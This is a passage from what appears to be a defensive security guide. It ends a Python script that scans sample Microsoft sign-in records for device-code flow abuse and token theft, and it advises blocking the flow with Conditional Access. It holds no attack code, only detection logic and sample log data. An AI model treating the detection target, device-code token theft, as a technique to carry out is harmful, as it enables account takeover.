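    # Carol's device-code attempt failed (non-zero errorCode), so no token to worry about.
    _signin("carol@example.com", "2026-05-12T15:00:00Z", "198.51.100.9", "US", "Microsoft Graph", "deviceCode", 50058),
]

if __name__ == "__main__":
    for alert in detect_device_code_abuse(SAMPLE_SIGNINS):
        print(alert)
```

The check is a hunting query, not a preventive control: where users have no business need for the device code flow, the more durable fix is to block it with the Conditional Access "Authentication flows" condition, and to treat any device-code sign-in that still appears as worth the same scrutiny as a token theft.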